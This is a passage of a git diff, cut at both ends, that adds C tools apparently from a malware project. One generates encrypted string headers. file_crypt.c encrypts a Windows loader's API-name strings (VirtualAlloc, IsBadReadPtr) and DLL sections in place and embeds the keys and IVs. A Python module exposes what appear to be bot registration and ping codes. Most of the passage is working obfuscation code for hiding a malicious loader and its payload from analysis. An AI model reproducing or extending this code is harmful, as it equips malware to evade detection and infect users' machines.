with %d\n", argv[0], ret); + } + + if (argc != 5) { + printf("usage: %s [AES|XOR] [STRING.h] [CRYPTED.h] [KEYNAME-DEFINE]\n", argv[0]); + printf("e.g.: %s aes include/aes_strings.h include/aes_strings_gen.h AESKEY\n", argv[0]); + exit(EXIT_FAILURE); + } + + bool doAes; + if (strcasecmp(argv[1], "aes") == 0) { + doAes = true; + } else if (strcasecmp(argv[1], "xor") == 0) { + doAes = false; + } else { + printf("%s error: [AES|XOR] and not %s\n", argv[0], argv[1]); + exit(EXIT_FAILURE); + } + + char* cstr_key = NULL; + if (doAes) { + memset(&aeskey[0], '\0', sizeof(aeskey)); + aes_randomkey(&aeskey[0], sizeof(aeskey)); + + ctx = aes_alloc_ctx(&aeskey[0], sizeof(aeskey)); + cstr_key = gencstr(&aeskey[0], sizeof(aeskey)); + } else { + xorkey = xor32_randomkey(); + cstr_key = gencstr((unsigned char*)&xorkey, sizeof(xorkey)); + } + + FILE* infile = fopen(argv[2], "r"); + FILE* outfile = fopen(argv[3], "w+"); + if (!infile || !outfile) { + printf("%s: %s does not exist!\n", argv[0], (!infile ? argv[2] : argv[3])); + exit(EXIT_FAILURE); + } + + char* keydef = NULL; + char* keysizdef = NULL; + if (doAes) { + asprintf(&keydef, "#define %s \"", argv[4]); + fwrite(keydef, 1, strlen(keydef), outfile); + fwrite(cstr_key, 1, strlen(cstr_key), outfile); + fwrite("\"\n", 1, 2, outfile); + asprintf(&keysizdef, "#define %sSIZ %u\n", argv[4], (unsigned int)(sizeof(aeskey)/sizeof(aeskey[0]))); + fwrite(keysizdef, 1, strlen(keysizdef), outfile); + free(cstr_key); + } else { + asprintf(&keydef, "#define %s ", argv[4]); + char xorkeystr[12]; + snprintf(&xorkeystr[0], 11, "%u", xorkey); + xorkeystr[11] = '\0'; + fwrite(keydef, 1, strlen(keydef), outfile); + fwrite(&xorkeystr[0], 1, strlen(xorkeystr), outfile); + fwrite("\n", 1, 1, outfile); + asprintf(&keysizdef, "#define %sSIZ %u\n", argv[4], (unsigned int)sizeof(xorkey)); + fwrite(keysizdef, 1, strlen(keysizdef), outfile); + } + free(keysizdef); + keysizdef = NULL; + + char line[MAX_LINE]; + memset(&line[0], '\0', sizeof(line)); + while (fgets(line, sizeof(line), infile)) { + char* tmp = line; + char* enc = NULL; char* header = NULL; char* trailer = NULL; + uint32_t enclen = 0; + bool gotStr = false; + + if ( strstr(tmp, "#define") == tmp ) { + tmp += strlen("#define"); + if ( (tmp = strchr(tmp, '"')) ) { + tmp++; + header = tmp; + char* str = strchr(tmp, '"'); + if (str) { + trailer = str; + enclen = str-tmp; + enc = calloc(sizeof(char), enclen+1); + memcpy(enc, tmp, enclen); + genUnescapedBuf(enc, &enclen); + gotStr = true; + } + } + } else if ( strstr(tmp, "/*") ) { + if ( (tmp = strchr(tmp, ' ')) ) { + while (*(++tmp) == ' ') {} + size_t len = strlen(tmp); + if (strstr(tmp, "SECTION:") == tmp && + tmp[len-1] == '\n' && tmp[len-2] == '/' && + tmp[len-3] == '*' && tmp[len-4] == ' ') { + addDefineName(tmp, DT_SECTION, &cur); + } else if (strstr(tmp, "ENDSECTION") == tmp) { + addDefineName(tmp-1, DT_ENDSECTION, &cur); + } + } + } + + if (gotStr) { + uint32_t newsiz = 0; + char* out = NULL; + if (doAes) { + out = aes_crypt_s(ctx, enc, enclen, &newsiz, true); + } else { + out = alignedCopyBuffer(enc, &enclen, xor_align); + xor32_byte_crypt((unsigned char*)out, enclen, xorkey); + newsiz = enclen; + } + char* outcstr = gencstr((unsigned char*)out, newsiz); + + fwrite(&line[0], 1, header-&line[0], outfile); + fwrite(outcstr, 1, strlen(outcstr), outfile); + fwrite(trailer, 1, strlen(trailer), outfile); + addDefineName(&line[0], DT_DEFAULT, &cur); + + free(outcstr); + free(out); + free(enc); + } else { + fwrite(&line[0], 1, strlen(line), outfile); + } + + memset(&line[0], '\0', sizeof(line)); + } + + if (!doAes) { + if (addStrStructEntries(outfile, argv[4], defs, true) != 0) + exit(1); + if (addStrStructEntries(outfile, argv[4], defs, false) != 0) + exit(1); + if (addStrEnumEntries(outfile, argv[4], defs, true) != 0) + exit(1); + if (addStrEnumEntries(outfile, argv[4], defs, false) != 0) + exit(1); + } + + fclose(infile); + fclose(outfile); + + free(keydef); + if (doAes) { + aes_free_ctx(ctx); + } + exit(EXIT_SUCCESS); +} diff --git a/source/tools/host/old/file_crypt.c b/source/tools/host/old/file_crypt.c new file mode 100644 index 0000000..8548cfa --- /dev/null +++ b/source/tools/host/old/file_crypt.c @@ -0,0 +1,802 @@ +#include <stdio.h> +#include <stdlib.h> +#include <stdint.h> +#include <stdbool.h> +#include <string.h> +#include <time.h> +#include <getopt.h> +#include <errno.h> + +#include <sys/mman.h> +#include <ctype.h> + +#include "crypt.h" +#include "helper.h" +#include "loader.h" + + +static const char base64table[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"; +static const unsigned char loader_endmarker[] = { _LOADER_ENDMARKER }; + + +static void base64_block_encode(const char plain[3], char encoded[4]) +{ + unsigned char b0 = 0, b1 = 0, b2 = 0, b3 = 0; + + b0 = ((plain[0] & 0xFC) >> 2); + b1 = ((plain[1] & 0xF0) >> 4) | ((plain[0] & 0x03) << 4); + b2 = ((plain[1] & 0x0F) << 2) | ((plain[2] & 0xC0) >> 6); + b3 = ( plain[2] & 0x3F); + encoded[0] = base64table[b0]; + encoded[1] = base64table[b1]; + encoded[2] = base64table[b2]; + encoded[3] = base64table[b3]; +} + +static char* base64_encode(const char* plain, size_t siz, size_t* newsizptr) +{ + size_t padded = (siz % 3 == 0 ? 0 : 3 - (siz % 3)); + size_t newsiz = ( (siz + padded)/3 ) * 4; + char* tmp = calloc(newsiz, sizeof(char)); + + size_t i, j = 0; + for (i = 0; i < siz-(siz%3); i+=3) { + base64_block_encode(&plain[i], &tmp[j]); + j += 4; + } + + if (padded > 0) { + char pad[3] = { 0x00, 0x00, 0x00 }; + for (i = 0; i < 3-padded; ++i) { + pad[i] = plain[siz-(siz%3)+i]; + } + + base64_block_encode(&pad[0], &tmp[j]); + + for (i = 0; i < padded; ++i) { + tmp[j+3-i] = '='; + } + } + + if (newsizptr) + *newsizptr = newsiz; + return tmp; +} + +static inline int xor32_crypt(uint32_t u32, uint32_t key) +{ + return u32 ^ key; +} + +static uint32_t xor32_crypt_buf(uint32_t* buf, uint32_t siz, uint32_t key) +{ + uint32_t pad = siz % sizeof(key); + if (pad) { + siz += sizeof(key) - pad; + } + uint32_t msiz = (uint32_t)(siz/sizeof(key)); + + for (register uint32_t i = 0; i < msiz; ++i) { + buf[i] = xor32_crypt(buf[i], key); + } + return siz; +} + +static uint32_t xor32_pcbc_encrypt_buf(uint32_t* buf, uint32_t siz, uint32_t iv, uint32_t key) +{ + uint32_t pad = siz % sizeof(key); + if (pad) { + siz += sizeof(key) - pad; + } + uint32_t msiz = (uint32_t)(siz/sizeof(key)); + + register uint32_t prev = iv; + for (register uint32_t i = 0; i < msiz; ++i) { + register uint32_t plain = buf[i]; + register uint32_t tmp = xor32_crypt(plain, prev); + register uint32_t crypt = xor32_crypt(tmp, key); + prev = xor32_crypt(crypt, plain); + buf[i] = crypt; + } + return siz; +} + +static void xor32_pcbc_decrypt_buf(uint32_t* buf, uint32_t siz, uint32_t iv, uint32_t key) +{ + uint32_t msiz = (uint32_t)(siz/sizeof(key)); + + register uint32_t prev = iv; + for (register uint32_t i = 0; i < msiz; ++i) { + register uint32_t crypt = buf[i]; + register uint32_t tmp = xor32_crypt(crypt, key); + register uint32_t plain = xor32_crypt(tmp, prev); + prev = xor32_crypt(crypt, plain); + buf[i] = plain; + } +} + +static ssize_t search_endmarker(unsigned char* buf, size_t siz, size_t *found_ptr) +{ + size_t endmarker_siz = sizeof(loader_endmarker)/sizeof(loader_endmarker[0]); + size_t real_siz = (siz - (siz % endmarker_siz)); + size_t marker_idx = 0, found = 0; + ssize_t offset = -1; + + for (size_t i = 0; i < real_siz; ++i) { + if (buf[i] == loader_endmarker[marker_idx++]) { + if (marker_idx == endmarker_siz) { + offset = i - (endmarker_siz - 1); + marker_idx = 0; + found++; + } + } else marker_idx = 0; + } + if (found_ptr) + *found_ptr = found; + if (found != 1) { + return -1; + } + return offset; +} + +static unsigned char* parse_hex_str(const char* hex_str, size_t* newsiz) +{ + const char* pos = hex_str; + size_t len = strlen(hex_str); + + *newsiz = len/2; + unsigned char* bin = calloc(*newsiz, sizeof(char)); + size_t i = 0; + bool skip_next = false; + + while ( *pos != '\0' ) { + if (!skip_next) { + if (sscanf(pos, "%2hhx", &bin[i]) == 1) { + pos++; + if (tolower(*pos) != 'x') { + i++; + } + skip_next = true; + continue; + } + } else skip_next = false; + pos++; + } + *newsiz = i; + return bin; +} + +static void bswap32_endianess(unsigned char* bytebuf, size_t siz) +{ + if (siz % 4 != 0) { + return; + } + for (size_t i = 0; i < siz; i+=4) { + unsigned char highest_byte = bytebuf[i]; + unsigned char higher_byte = bytebuf[i+1]; + bytebuf[i] = bytebuf[i+3]; + bytebuf[i+1] = bytebuf[i+2]; + bytebuf[i+2] = higher_byte; + bytebuf[i+3] = highest_byte; + } +} + + +enum emode { E_NONE = 0, E_BASE64, E_XOR32, E_XOR32PCBC, E_XOR32NPCBC }; +enum dmode { D_NONE = 0, D_CRYPT_SZVA, D_CRYPT_SZIB, D_CRYPT_SECTION }; + +struct options { + bool verbose; + bool print_buffer; + enum emode encmode; + uint32_t ivkeysize; + char* outfile; + char* infile; + unsigned char* inkey; + size_t keysize; + unsigned char* iniv; + size_t ivsize; + bool ldrmod; + off_t ldroffset; + enum dmode crpmode; + char* ldr_dll; + off_t dlloffset; + size_t dllsize; + bool dryrun; +} app_options; + +static const struct option long_options[] = { + {"verbose", no_argument, 0, 'v'}, + {"print-buffer", no_argument, 0, 'p'}, + {"outfile", required_argument, 0, 'o'}, + {"xor32", no_argument, 0, 1 }, + {"xor32pcbc", no_argument, 0, 2 }, + {"xor32npcbc", no_argument, 0, 3 }, + {"ivkeysize", required_argument, 0, 'k'}, + {"base64", no_argument, 0, 4 }, + {"key", required_argument, 0, 'e'}, + {"iv", required_argument, 0, 'i'}, + {"loader-offset", required_argument, 0, 'l'}, + {"loader-va", no_argument, 0, 5 }, + {"loader-ib", no_argument, 0, 6 }, + {"dll-file", required_argument, 0, 'f'}, + {"dll-hdr", required_argument, 0, 7 }, + {"dll-section", required_argument, 0, 8 }, + {"dry-run", no_argument, 0, 'd'}, + {NULL, 0, 0, 0} +}; +enum { + OPTDLL_OFFSET = 0, OPTDLL_SIZE, + OPTDLL_MAX +}; +static char* dllsubopts[] = { + [OPTDLL_OFFSET] = "offset", + [OPTDLL_SIZE] = "size", + NULL +}; +static const char const* options_help[] = { + "more output", + "print encrypted/decrypted binary buffers (hex format; massive output!)", + "output file", + "simple and unsecure 32-bit xor cipher", + "unsecure xor32-bit block cipher", + "secure xor(32*n)-bit block cipher", + "iv and key size for cipher", + "base64 (en|de)coder", + "set a key which should be 4*n bytes long", + "same behavior as key", + "binary offset to loader endmarker (see: include/loader.h)", + "encrypt loader string: strVirtualAlloc", + "encrypt loader string: strIsBadReadPtr", + "path to dll binary", + "encrypt dll header", + "encrypt dll section (requires argument offset and size)", + "dont write anything to disk" +}; +static const char const opt_fmt[] = "vpo:k:e:i:l:f:dh"; + +void +print_usage(char* arg0) +{ + fprintf(stderr, "usage: %s [OPTIONS] [INPUTFILE]\n\twhere options can be:\n", arg0); + const size_t alen = (sizeof(long_options)-sizeof(long_options[0])) / sizeof(long_options[0]); + for (size_t i = 0; i < alen; ++i) { + int hlen = ((int)strlen(options_help[i]) + 15) - (int)strlen(long_options[i].name); + char shortopt = (char)long_options[i].val; + printf("\t\t"); + if (isalpha(shortopt) != 0) { + printf("-%c,", shortopt); + } else { + hlen += 3; + } + printf("--%s", long_options[i].name); + if (long_options[i].has_arg == required_argument) { + printf(" [arg]"); + } else { + hlen += 6; + } + printf("%*s\n", hlen, options_help[i]); + } +} + +void +check_loader_arg(char* arg0) +{ + if (app_options.crpmode != D_NONE) { + fprintf(stderr, "%s: loader crypt mode already set, only ONE allowed\n", arg0); + exit(1); + } +} + +void +parse_arguments(int argc, char** argv) +{ + int c; + + if (argc <= 1) { + print_usage(argv[0]); + exit(1); + } + + memset(&app_options, '\0', sizeof(app_options)); + while (1) { + int optind = 0; + char* endptr = NULL; + + c = getopt_long(argc, argv, opt_fmt, long_options, &optind); + if (c == -1) + break; + + switch(c) { + case 'v': + app_options.verbose = true; + break; + case 'p': + app_options.print_buffer = true; + break; + case 'o': + app_options.outfile = strdup(optarg); + break; + case 1: + app_options.encmode = E_XOR32; + break; + case 2: + app_options.encmode = E_XOR32PCBC; + break; + case 3: + app_options.encmode = E_XOR32NPCBC; + break; + case 'k': + errno = 0; + app_options.ivkeysize = strtoul(optarg, &endptr, 10); + if (errno == ERANGE || errno == EINVAL || *endptr != '\0' || app_options.ivkeysize < 1) { + fprintf(stderr, "%s: ivkeysize not an unsigned decimal aka size_t\n", argv[0]); + exit(1); + } + break; + case 4: + app_options.encmode = E_BASE64; + break; + case 'e': + app_options.inkey = parse_hex_str(optarg, &app_options.keysize); + if (app_options.inkey == NULL) { + fprintf(stderr, "%s: not a valid byte-aligned hex string: %s\n", argv[0], optarg); + exit(1); + } + break; + case 'i': + app_options.iniv = parse_hex_str(optarg, &app_options.ivsize); + if (app_options.iniv == NULL) { + fprintf(stderr, "%s: not a valid byte-aligned hex string: %s\n", argv[0], optarg); + exit(1); + } + break; + case 'l': + errno = 0; + app_options.ldroffset = (size_t)strtoul(optarg, &endptr, 10); + if (errno == ERANGE || errno == EINVAL || *endptr != '\0') { + fprintf(stderr, "%s: ldroffset not an unsigned decimal aka size_t\n", argv[0]); + exit(1); + } + app_options.ldrmod = true; + break; + case 5: + check_loader_arg(argv[0]); + app_options.crpmode = D_CRYPT_SZVA; + break; + case 6: + check_loader_arg(argv[0]); + app_options.crpmode = D_CRYPT_SZIB; + break; + case 'f': + app_options.ldr_dll = strdup(optarg); + break; + case 7: + check_loader_arg(argv[0]); + app_options.crpmode = D_CRYPT_SECTION; + errno = 0; + app_options.dlloffset = 0; + app_options.dllsize = strtoul(optarg, &endptr, 10); + if (errno == ERANGE || errno == EINVAL || *endptr != '\0' || app_options.dllsize < 1) { + fprintf(stderr, "%s: dll header size is not an unsigned decimal aka size_t\n", argv[0]); + exit(1); + } + break; + case 8: + check_loader_arg(argv[0]); + app_options.crpmode = D_CRYPT_SECTION; + char* subopts = optarg; + char* value = NULL; + int errfnd = 0; + int opt; + while (*subopts != '\0' && !errfnd) { + errno = 0; + switch ( (opt = getsubopt(&subopts, dllsubopts, &value)) ) { + case OPTDLL_OFFSET: + if (value) + app_options.dlloffset = strtoul(value, &endptr, 10); + break; + case OPTDLL_SIZE: + if (value) + app_options.dllsize = strtoul(value, &endptr, 10); + break; + default: + fprintf(stderr, "%s: no match found for token: \"%s\"\n", argv[0], value); + errfnd = 1; + continue; + } + if (value == NULL) { + fprintf(stderr, "%s: missing value for subopt %s\n", argv[0], dllsubopts[opt]); + errfnd = 1; + } + if (errno == ERANGE || errno == EINVAL || *endptr != '\0') { + fprintf(stderr, "%s: dll subopt \"%s\" is not a valid unsigned decimal\n", argv[0], dllsubopts[opt]); + errfnd = 1; + } + } + if (app_options.dlloffset < 1 || app_options.dllsize < 1) { + fprintf(stderr, "%s: dll-section requires subopts %s and %s\n", argv[0], dllsubopts[OPTDLL_OFFSET], dllsubopts[OPTDLL_SIZE]); + errfnd = 1; + } + if (errfnd) { + exit(1); + } + break; + case 'd': + app_options.dryrun = true; + break; + + case 'h': + default: + print_usage(argv[0]); + exit(1); + } + } + + while (optind < argc) { + if (app_options.infile == NULL) { + app_options.infile = strdup(argv[optind++]); + } else { + fprintf(stderr, "%s: non argv elements\n", argv[optind++]); + exit(1); + } + } + + if (app_options.infile == NULL) { + fprintf(stderr, "%s: no input file\n", argv[0]); + exit(1); + } + if (app_options.outfile) { + if (strcmp(app_options.infile, app_options.outfile) == 0) { + fprintf(stderr, "%s: input file and output file should be two different files\n", argv[0]); + exit(1); + } + } + + switch (app_options.encmode) { + case E_NONE: + fprintf(stderr, "%s: no mode set\n", argv[0]); + exit(1); + case E_XOR32: + if (app_options.iniv != NULL) { + fprintf(stderr, "%s: iv is not allowed in this mode\n", argv[0]); + exit(1); + } + case E_XOR32PCBC: + if (app_options.ivkeysize != 0) { + fprintf(stderr, "%s: setting --ivkeysize not allowed in this mode (ivkeysize=1!)\n", argv[0]); + exit(1); + } + app_options.ivkeysize = 1; + if ((app_options.inkey != NULL && app_options.keysize != 4) || + (app_options.iniv != NULL && app_options.ivsize != 4)) { + fprintf(stderr, "%s: --iv/--key size MUST be 4 bytes e.g. 0xdeadc0de\n", argv[0]); + exit(1); + } + break; + case E_XOR32NPCBC: + if (app_options.crpmode != D_NONE) + break; + if (!app_options.inkey && !app_options.iniv && app_options.ivkeysize == 0) { + fprintf(stderr, "%s: missing ivkeysize\n", argv[0]); + exit(1); + } + if ((app_options.inkey != NULL && app_options.keysize % 4 != 0) || + (app_options.iniv != NULL && app_options.ivsize % 4 != 0)) { + fprintf(stderr, "%s: --iv/--key size MUST be 4*n bytes e.g. 0xdeadc0dedeadbeef\n", argv[0]); + exit(1); + } + if (app_options.inkey != NULL && app_options.iniv != NULL && + app_options.keysize != app_options.ivsize) { + fprintf(stderr, "%s: --iv/--key size MUST be equal\n", argv[0]); + exit(1); + } + if (app_options.inkey != NULL) { + app_options.ivkeysize = app_options.keysize / 4; + } else if (app_options.iniv != NULL) { + app_options.ivkeysize = app_options.ivsize / 4; + } + break; + case E_BASE64: + if (app_options.inkey != NULL || + app_options.iniv != NULL || + app_options.ivkeysize != 0) { + fprintf(stderr, "%s: --iv/--key/--ivkeysize not allowed in base64 mode\n", argv[0]); + exit(1); + } + break; + } + if (app_options.crpmode != D_NONE) { + if (app_options.encmode != E_XOR32NPCBC) { + fprintf(stderr, "%s: loader modifications only work with xor32npcbc\n", argv[0]); + exit(1); + } + if (app_options.ivkeysize != 0) { + fprintf(stderr, "%s: setting key/iv size not allowed in this mode\n", argv[0]); + exit(1); + } + if (app_options.crpmode == D_CRYPT_SECTION) { + if (app_options.ldr_dll == NULL) { + fprintf(stderr, "%s: missing dll file\n", argv[0]); + exit(1); + } + app_options.ivkeysize = LOADER_IVKEYLEN; + } else { + app_options.ivkeysize = LOADER_STR_IVKEYLEN; + } + if (app_options.crpmode != D_CRYPT_SECTION && app_options.outfile) { + fprintf(stderr, "%s: loader modification is done directly at the input binary, --outfile superfluous\n", argv[0]); + exit(1); + } + } + if (app_options.inkey != NULL) { + if (app_options.ldrmod == true) { + if (app_options.keysize != 12) { + fprintf(stderr, "%s: keysize must be 12 byte for loader string encryption\n", argv[0]); + exit(1); + } + } + bswap32_endianess(app_options.inkey, app_options.keysize); + } + if (app_options.iniv != NULL) { + if (app_options.ldrmod == true) { + if (app_options.ivsize != 12) { + fprintf(stderr, "%s: ivsize must be 12 byte for loader string encryption\n", argv[0]); + exit(1); + } + } + bswap32_endianess(app_options.iniv, app_options.ivsize); + } +} + +int main(int argc, char** argv) +{ + parse_arguments(argc, argv); + srandom(time(NULL)); + errno = 0; + + int ret = 0; + size_t siz = 0; + char* buf = mapfile(app_options.infile, &siz); + size_t orgsiz = siz; + char* orgbuf = buf; + bool print_crypted_str = false; + char* dllbuf = NULL; + + if (buf) { + if (app_options.ldrmod == false) { + size_t found = 0; + ssize_t offset = search_endmarker((unsigned char*)buf, siz, &found); + if (found != 1) { + fprintf(stderr, "%s: loader marker search error (found: %lu, offset: %ld (0x%X))\n", argv[0], found, offset, (unsigned int)offset); + exit(1); + } + if (app_options.verbose) { + printf("%s: loader marker found at offset %ld (0x%X)\n", argv[0], offset, (unsigned int)offset); + } + app_options.ldroffset = offset; + app_options.ldrmod = true; + } + + /* get loader struct */ + struct loader_x86_data* ldr = NULL; + if (app_options.ldrmod == true) { + if (memcmp((void*)(orgbuf + app_options.ldroffset), + (void*)loader_endmarker, + sizeof(loader_endmarker)/sizeof(loader_endmarker[0])) == 0) { + ldr = (struct loader_x86_data*)(orgbuf + + app_options.ldroffset + + sizeof(uint32_t) - sizeof(struct loader_x86_data)); + + if (memcmp((void*)&ldr->endMarker, + (void*)loader_endmarker, + sizeof(loader_endmarker)/sizeof(loader_endmarker[0])) != 0) { + fprintf(stderr, "%s: loader marker found, but not present after typecast, check loader struct in include/loader.h\n", argv[0]); + exit(1); + } + + char* chk = NULL; + if (app_options.crpmode == D_CRYPT_SZVA) { + buf = ldr->strVirtualAlloc; + siz = (sizeof(ldr->strVirtualAlloc)/sizeof(ldr->strVirtualAlloc[0])) - + (1 * sizeof(ldr->strVirtualAlloc[0])); + chk = buf; + } else if (app_options.crpmode == D_CRYPT_SZIB) { + buf = ldr->strIsBadReadPtr; + siz = (sizeof(ldr->strIsBadReadPtr)/sizeof(ldr->strIsBadReadPtr[0])) - + (1 * sizeof(ldr->strIsBadReadPtr[0])); + chk = buf; + } else if (app_options.crpmode == D_CRYPT_SECTION) { + dllbuf = buf = mapfile(app_options.ldr_dll, &siz); + buf += app_options.dlloffset; + siz = app_options.dllsize; + if (!buf) { + fprintf(stderr, "%s: could not map dll file into memory\n", argv[0]); + perror("mapfile"); + exit(1); + } + } + if (chk) + for (size_t i = 0; i < siz; ++i) + if (isalpha(buf[i]) == 0) { + fprintf(stderr, "%s: non ascii character found in loader string, already encrypted?\n", argv[0]); + fprintf(stderr, "%s: forcing --dry-run\n", argv[0]); + app_options.dryrun = true; + print_crypted_str = true; + break; + } + + uint32_t tmp[app_options.ivkeysize]; + memset(&tmp[0], '\0', app_options.ivkeysize*sizeof(uint32_t)); + if (memcmp(&tmp[0], &ldr->key[0], app_options.ivkeysize*sizeof(uint32_t)) != 0) { + if (app_options.inkey) { + fprintf(stderr, "%s: loader->key is not NULL, but --key set?\n", argv[0]); + exit(1); + } else { + app_options.inkey = calloc(app_options.ivkeysize, sizeof(uint32_t)); + memcpy(app_options.inkey, &ldr->key[0], app_options.ivkeysize*sizeof(uint32_t)); + } + } + if (memcmp(&tmp[0], &ldr->iv[0], app_options.ivkeysize*sizeof(uint32_t)) != 0) { + if (app_options.iniv) { + fprintf(stderr, "%s: loader->iv is not NULL, but --iv set?\n", argv[0]); + exit(1); + } else { + app_options.iniv = calloc(app_options.ivkeysize, sizeof(uint32_t)); + memcpy(app_options.iniv, &ldr->iv[0], app_options.ivkeysize*sizeof(uint32_t)); + } + } + } else { + fprintf(stderr, "%s: loader offset set, but no endmarker found\n", argv[0]); + exit(1); + } + } + + if (app_options.print_buffer) { + printf("Buffer (Size: %lu):\n", siz); + printbytebuf(buf, siz, 78, app_options.verbose); + } + + size_t newsiz = 0; + char* cryptd = NULL; + uint32_t key[app_options.ivkeysize]; + uint32_t iv[app_options.ivkeysize]; + memset(&key[0], '\0', app_options.ivkeysize*sizeof(uint32_t)); + memset(&iv[0], '\0', app_options.ivkeysize*sizeof(uint32_t)); + + /* copy key/iv if there are any */ + if (app_options.inkey != NULL) { + memcpy(&key[0], app_options.inkey, app_options.ivkeysize*sizeof(uint32_t)); + } + if (app_options.iniv != NULL) { + memcpy(&iv[0], app_options.iniv, app_options.ivkeysize*sizeof(uint32_t)); + } + + /* otherwise generate random iv/key if neccessary */ + for (uint32_t i = 0; i < app_options.ivkeysize; ++i) { + while (iv[i] == 0) { iv[i] = random(); } + while (key[i] == 0) { key[i] = random(); } + } + + /* update loader header */ + if (ldr && !app_options.dryrun) { + memcpy(&ldr->key[0], &key[0], app_options.ivkeysize*sizeof(uint32_t)); + memcpy(&ldr->iv[0], &iv[0], app_options.ivkeysize*sizeof(uint32_t)); + } + + /* encrypt */ + switch (app_options.encmode) { + case E_BASE64: + cryptd = base64_encode(buf, siz, &newsiz); + break; + case E_XOR32: + case E_XOR32PCBC: + cryptd = calloc(siz + 2*sizeof(uint32_t), sizeof(char)); + memcpy(cryptd, buf, siz); + if (app_options.encmode == E_XOR32) { + if (app_options.verbose) { + printf("Xor32Key: %08X\n", key[0]); + } + newsiz = xor32_crypt_buf((uint32_t*)cryptd, siz, key[0]); + } else { + if (app_options.verbose) { + printf("Xor32pcbcKey: %08X\tIV: %08X\n", key[0], iv[0]); + } + newsiz = xor32_pcbc_encrypt_buf((uint32_t*)cryptd, siz, iv[0], key[0]); + } + break; + case E_XOR32NPCBC: + cryptd = calloc(siz + (app_options.ivkeysize)*sizeof(uint32_t), sizeof(char)); + memcpy(cryptd, buf, siz); + if (app_options.verbose) { + printf("Xor32npcbcKey/IV:\n"); + for (uint32_t i = 0; i < app_options.ivkeysize; ++i) { + printf("%08X / %08X\n", key[i], iv[i]); + } + } + newsiz = xor32n_pcbc_crypt_buf((uint32_t*)cryptd, siz, &iv[0], &key[0], app_options.ivkeysize); + break; + case E_NONE: + default: + break; + } + + if (app_options.print_buffer) { + printf("Encoded (Size: %lu):\n", newsiz); + printbytebuf(cryptd, newsiz, 78, app_options.verbose); + } + + /* decrypt (and check if algorithm works correctly) */ + switch (app_options.encmode) { + case E_XOR32: + case E_XOR32PCBC: + case E_XOR32NPCBC: { + char* tmp = calloc(newsiz, sizeof(char)); + memcpy(tmp, cryptd, newsiz); + if (app_options.encmode == E_XOR32) { + newsiz = xor32_crypt_buf((uint32_t*)tmp, newsiz, key[0]); + } else if (app_options.encmode == E_XOR32PCBC) { + xor32_pcbc_decrypt_buf((uint32_t*)tmp, newsiz, iv[0], key[0]); + } else { + xor32n_pcbc_crypt_buf((uint32_t*)tmp, newsiz, &iv[0], &key[0], app_options.ivkeysize); + } + if (app_options.print_buffer) { + printf("Decoded (Size: %lu):\n", siz); + printbytebuf(tmp, siz, 78, app_options.verbose); + } + if (memcmp(tmp, buf, siz) != 0) { + ret = 1; + fprintf(stderr, "%s: ERROR: original buffer and decrypted buffer differs!\n", argv[0]); + } + free(tmp); + } + case E_BASE64: + case E_NONE: + default: + break; + } + + /* generate output file */ + if (app_options.outfile) { + ssize_t written = 0; + errno = 0; + if ((written = writebuf(app_options.outfile, (unsigned char*)cryptd, newsiz)) != newsiz) { + fprintf(stderr, "%s could not write to output file (%lu/%lu bytes written)\n", argv[0], written, newsiz); + perror("write"); + } + } + + /* update loader strings/dll section */ + if (!app_options.dryrun && + (app_options.crpmode == D_CRYPT_SZVA || + app_options.crpmode == D_CRYPT_SZIB || + app_options.crpmode == D_CRYPT_SECTION)) { + memcpy(buf, (unsigned char*)cryptd, newsiz); + } + if (print_crypted_str) { + printf("String: %*s\n", (int)newsiz, cryptd); + } + + /* unmap files and free memory */ + free(cryptd); + errno = 0; + if (app_options.crpmode == D_CRYPT_SECTION && munmap(dllbuf, siz) != 0) { + fprintf(stderr, "%s: err while unmapping loder dll\n", argv[0]); + perror("munmap"); + ret = 1; + } + errno = 0; + if (munmap(orgbuf, orgsiz) != 0) { + perror("munmap"); + ret = 1; + } + } else { + ret = 1; + perror("mapfile"); + } + + if (ret == 0) { + printf("%s: succeeded\n", argv[0]); + } + return ret; +} diff --git a/source/tools/host/old/pyhttp.c b/source/tools/host/old/pyhttp.c new file mode 100644 index 0000000..b66576f --- /dev/null +++ b/source/tools/host/old/pyhttp.c @@ -0,0 +1,188 @@ +/* + * Module: pyhttp.c + * Author: Toni Uhlig <matzeton@googlemail.com> + * Purpose: Python loadable module for http codes/flags + */ + +#include "helper.h" /* must be the first include if compiling a python module */ + +#include <stdio.h> +#include <stdlib.h> + +#include "compat.h" +#include "http.h" +#include "xor_strings.h" /* DLLSECTION */ + + +static const char pname[] = "pyhttp"; + + +static PyObject* info(PyObject* self, PyObject* args) +{ + printf("%s: http codes/flags\n", pname); + Py_RETURN_NONE; +} + +#define PYDICT_SET_CMACRO(name, obj) PyDict_SetItemString( dict, name, obj ); +#define PYDICT_SETI_CMACRO(mname) { PyObject* pyval = Py_BuildValue("I", mname); if (pyval) { PYDICT_SET_CMACRO( #mname, pyval ); Py_DECREF(pyval); } } +#define PYDICT_SETS_CMACRO(mname) { PyObject* pyval = Py_BuildValue("s", mname); if (pyval) { PYDICT_SET_CMACRO( #mname, pyval ); Py_DECREF(pyval); } } +static PyObject* __http_getCodes(PyObject* self, PyObject* args) +{ + PyObject* dict = PyDict_New(); + PYDICT_SETI_CMACRO(RC_INFO); + PYDICT_SETI_CMACRO(RC_REGISTER); + PYDICT_SETI_CMACRO(RC_PING); + return dict; +} + +static PyObject* __http_getCodeSiz(PyObject* self, PyObject* args) +{ + return Py_BuildValue("I", sizeof(rrcode)); +} + +static PyObject* __http_getFlags(PyObject* self, PyObject* args) +{ + PyObject* dict = PyDict_New(); + PYDICT_SETI_CMACRO(RF_AGAIN); + PYDICT_SETI_CMACRO(RF_ERROR); + PYDICT_SETI_CMACRO(RF_OK); + + return dict; +} + +static PyObject* __http_getFlagSiz(PyObject* self, PyObject* args) +{ + return Py_BuildValue("I", sizeof(rflags)); +} + +static PyObject* __http_getConsts(PyObject* self, PyObject* args) +{ + PyObject* dict = PyDict_New(); + PYDICT_SETS_CMACRO(DLLSECTION); + PYDICT_SETI_CMACRO(SID_LEN); + PYDICT_SETI_CMACRO(SID_ZEROES0); + PYDICT_SETI_CMACRO(SID_ZEROES1); + PYDICT_SETI_CMACRO(MARKER_SIZ); + PYDICT_SETI_CMACRO(RND_LEN); + PYDICT_SETI_CMACRO(AESKEY_SIZ); + + return dict; +} + +static PyObject* __http_parseResponse(PyObject* self, PyObject* args) +{ + PyObject* ctxRecvBuffer = NULL; + PyObject* ctxStartMarker = NULL; + Py_buffer recvBuffer = {0}, startMarker = {0}; + PyObject* rList = Py_BuildValue("[]"); + + if (! PyArg_ParseTuple(args, 